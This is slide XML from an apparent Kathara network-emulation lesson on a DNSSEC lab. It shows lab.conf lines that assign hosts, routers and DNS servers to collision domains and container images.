                <a:t>[ipv6]="false"</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:endParaRPr lang="en-US" sz="1600" b="1" noProof="0" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="13322" name="AutoShape 114">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4CAADBF9-F74C-79B9-2E19-7A30C029391C}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2491" y="3333"/>
              <a:ext cx="622" cy="57"/>
            </a:xfrm>
            <a:prstGeom prst="foldedCorner">
              <a:avLst>
                <a:gd name="adj" fmla="val 8278"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="accent2"/>
            </a:solidFill>
            <a:ln w="19050">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:round/>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r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>lab.conf</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1600" b="1" noProof="0" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="133002771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84986D-7200-5635-2856-1EEC1A9DD99E}"/>
            </a:ext>
          </a:extLst>
        </p:cNvPr>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13316" name="Rectangle 95">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{49F2CD6E-C6C6-26BA-5186-7739839123EB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0"/>
              <a:t>a quick look at the lab</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Segnaposto data 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BCF2E14C-BEFD-D8CC-79E2-41AE4518D2EC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>last update: Feb 2026</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Segnaposto piè di pagina 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EC743C7E-D80B-807D-2CD6-1B2EFDA74FBE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>kathara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> – [ lab: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>dnssec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> ]</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="13319" name="Group 117">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FB3E12B5-3D59-231B-ADD7-4BF0AFE828FB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="609093" y="1217551"/>
            <a:ext cx="7335694" cy="5063541"/>
            <a:chOff x="2448" y="3333"/>
            <a:chExt cx="3786" cy="722"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="13321" name="AutoShape 113">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{29FA186C-B7C1-772C-B5A0-405C628585B9}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2448" y="3362"/>
              <a:ext cx="3786" cy="693"/>
            </a:xfrm>
            <a:prstGeom prst="foldedCorner">
              <a:avLst>
                <a:gd name="adj" fmla="val 8278"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="bg1"/>
            </a:solidFill>
            <a:ln w="19050">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
            <a:effectLst>
              <a:outerShdw dist="107763" dir="2700000" algn="ctr" rotWithShape="0">
                <a:schemeClr val="bg2"/>
              </a:outerShdw>
            </a:effectLst>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none"/>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endParaRPr lang="en-US" sz="1600" b="1" noProof="0" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>pc4[0]="B"</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>pc4[image]="</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>kathara</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>/bind:9.16"</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>pc4[ipv6]="false"</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>r2[0]="B"</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>r2[image]="</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>kathara</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>/base"</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>r2[ipv6]="false"</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>r1[1]="C"</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>r2[1]="C"</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>dnsit</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>[0]="C"</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>dnsit</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>[image]="</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>kathara</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>/bind:9.16"</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>dnsit</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>[ipv6]="false"</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>dnsroot</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>[0]="C"</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>dnsroot</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>[image]="</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>kathara</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>/bind:9.16"</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>dnsroot</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>[ipv6]="false"</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:endParaRPr lang="en-US" sz="1600" b="1" noProof="0" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="13322" name="AutoShape 114">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{81FBB0DB-E380-E5DD-0E42-CE0E4237A7C7}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2491" y="3333"/>
              <a:ext cx="622" cy="57"/>
            </a:xfrm>
            <a:prstGeom prst="foldedCorner">
              <a:avLst>
                <a:gd name="adj" fmla="val 8278"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="accent2"/>
            </a:solidFill>
            <a:ln w="19050">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:round/>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r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>lab.conf</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1600" b="1" noProof="0" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="254536134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7E1188-85FF-A0CD-391C-501009330532}"/>
            </a:ext>
          </a:extLst>
        </p:cNvPr>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13316" name="Rectangle 95">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{02B97A9A-75CA-FE7D-8986-E147D129463C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0"/>
              <a:t>a quick look at the lab</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Segnaposto data 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8C71DE26-2A1C-7553-61ED-9533BDD44748}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>last update: Feb 2026</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Segnaposto piè di pagina 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{621AC629-7D4F-2988-77BD-476FEE28BC3B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>kathara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> – [ lab: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>dnssec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> ]</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="13319" name="Group 117">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DEC35567-6871-8383-C288-8BE4D2B0F92F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="609093" y="1217551"/>
            <a:ext cx="7335694" cy="5063541"/>
            <a:chOff x="2448" y="3333"/>
            <a:chExt cx="3786" cy="722"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="13321" name="AutoShape 113">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9A9AC402-15C2-CFF5-6F05-66ACBF01F646}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2448" y="3362"/>
              <a:ext cx="3786" cy="693"/>
            </a:xfrm>
            <a:prstGeom prst="foldedCorner">
              <a:avLst>
                <a:gd name="adj" fmla="val 8278"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="bg1"/>
            </a:solidFill>
            <a:ln w="19050">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
            <a:effectLst>
              <a:outerShdw dist="107763" dir="2700000" algn="ctr" rotWithShape="0">
                <a:schemeClr val="bg2"/>
              </a:outerShdw>
            </a:effectLst>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none"/>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marL="285750" indent="-285750" eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
              </a:pPr>
              <a:endParaRPr lang="en-US" sz="1600" noProof="0" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>pc3[0]="D"</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>pc3[image]="</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>lscr.io</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>/</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>linuxserver</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>/</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>firefox</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>"</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
